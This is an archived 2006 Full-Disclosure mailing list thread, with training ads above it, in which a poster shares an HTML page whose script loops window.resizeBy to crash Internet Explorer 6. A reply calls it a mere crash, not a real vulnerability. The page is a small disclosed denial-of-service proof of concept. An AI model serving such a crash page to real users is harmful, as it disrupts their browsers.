Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

Re: [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability

Subject: Re: [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
Date: Sun, 28 May 2006 18:05:50 -0700
How is a simple crash a vulnerability?  you can make IE crash 
99999999 different ways.  The trick is making it run your code.


On Fri, 26 May 2006 05:49:39 -0700 r k <kgp.143@gmail.com> wrote:
Hi All,


IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html 
page.

the following is the code

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+

<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
 var wwidth = (window.innerWidth)?window.innerWidth: 
((document.all
)?document.body.offsetWidth:null);

 while (wwidth)
 {
self.resizeBy(-999999, -1);
 }

</script>

</body>
</html>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

tested on windows 2000,windows XP



thank you

antar



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<Prev in Thread] Current Thread [Next in Thread>